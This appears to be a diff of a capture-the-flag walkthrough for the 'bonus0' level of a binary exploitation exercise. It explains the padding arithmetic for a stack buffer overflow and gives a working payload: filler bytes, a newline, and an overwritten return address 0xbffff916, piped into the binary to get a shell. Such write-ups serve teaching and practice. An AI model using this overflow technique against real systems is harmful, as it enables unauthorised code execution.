mirsella/rainfall/bonus0/walkthrough.md

 `./a.out code` -> `0xbffff916`

-4096 because of the read() syscall that read 4096 bytes from stdin for input1. full payload:
+4096 because of the read() syscall that read 4096 bytes from stdin for input1, so we fill it to go to the second read using a single file as input.
+9 + 4 + 7 = 20
+full payload:
 `python -c "print 'i'*4095 + '\n' + 'i'*9 + '\x16\xf9\xff\xbf' + 'i'*7" > /tmp/a`
 `cat /tmp/a - |./bonus0`